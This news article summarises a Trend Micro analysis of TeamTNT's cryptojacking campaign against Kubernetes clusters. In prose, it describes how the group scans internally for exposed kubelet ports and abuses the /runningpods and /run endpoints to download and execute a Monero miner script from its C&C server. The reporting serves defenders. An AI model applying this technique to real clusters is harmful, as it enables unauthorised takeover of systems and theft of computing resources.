Researchers at Trend Micro shared details about a cryptojacking campaign aimed at Kubernetes clusters. They discovered that TeamTNT, a threat actor behind this campaign, compromised nearly 50,000 IP addresses, with most of the compromised nodes located in China and the US.
Trend Micro analyzed data belonging to a few TeamTNT servers, which gave the research team an insight into what tools and techniques the group used in the observed campaign.
The TeamTNT gang has been active since April 2020 and has been known to target Docker and Kubernetes installs. TeamTNT usually scans the internet in search of misconfigured Docker containers and Kubernetes installations and infects them with a malicious cryptocurrency miner and a DDoS malware.
“We have found and confirmed close to 50,000 IPs compromised by this attack perpetrated by TeamTNT across multiple clusters. Several IPs were repeatedly exploited during the timeframe of the episode, occurring between March and May. Most of the compromised nodes were from China and the US — identified in the ISP (Internet Service Provider) list, which had Chinese and US-based providers as the highest hits, including some CSPs (Cloud Service Providers),” Trend Micro wrote in its recent report.
The researchers analyzed one of the scripts employed in the attacks against the Kubernetes clusters they collected from a server (kube[.]lateral[.]sh) used by the TeamTNT group. At the time of the investigation the script had low detection rates in VirusTotal, Trend Micro said.
The attack begins from the threat actor attempting to disable the bash history on the target host and define environment variables for their command and control (C&C) server, such as the script to install the crypto miner later and the binary of the XMRig Monero miner.
The script then installs two open-source tools - the network scanning tool masscan (developed in C) and the banner-grabbing, deprecated Zgrab (developed in Go).
The next stage of attack involves installing an attacker’s IRC bot based on another famous IRC bot called Kaiten, which is stored on the /tmp folder under the name kube.c to avoid suspicion.
TeamTNT uses the Masscan scanner to scan the internal network of the targeted Kubernetes cluster for unsecured or misconfigured Kubelet agents. The kubelet API port (10250) should not be exposed online but TeamTNT is compromising the kubelet after gaining access to the environment, so they run scans internally.
“In the last part of the script, we can see a function — kube_pwn() — being declared. As seen from the code, the kube_pwn function uses Masscan to check any hosts with port 10250 open […] the first thing the kube_pwn() function does is to get some information from the Kubelet API via the /runningpods endpoint, filtering the namespace, pod name and container names.” Trend Micro explained.
“As we can see from the kubelet server.go code above, the API endpoint /runningpods does exactly what the endpoint says, it lists the running pods. First, the kube_pwn() function lists all the current running pods inside the node in a JSON format.”
For each container running on each node the kube_pwn() function takes advantage of the /run endpoint on the kubelet API to run the following commands:
1. Updates the package index of the container.
2. Installs the following packages: bash, wget and curl.
3. Downloads a shell script called setup_xmr.sh from the TeamTNT C&C server and saves it on the tmp folder.
4. Executes the script to start mining for the Monero cryptocurrency.
“To finish this, they run the same kube_pwn() function we analyzed against a series of internal IP ranges looking for new targets to compromise, with similar behavior to a worm,” Trend Micro said.
“The high number of targets shows that TeamTNT is still expanding its reach (especially in cloud environments) and perhaps infrastructure since the group can monetize a more significant amount from their campaigns with more potential victims. The group’s activities add to the number of potential threats that Kubernetes users face.”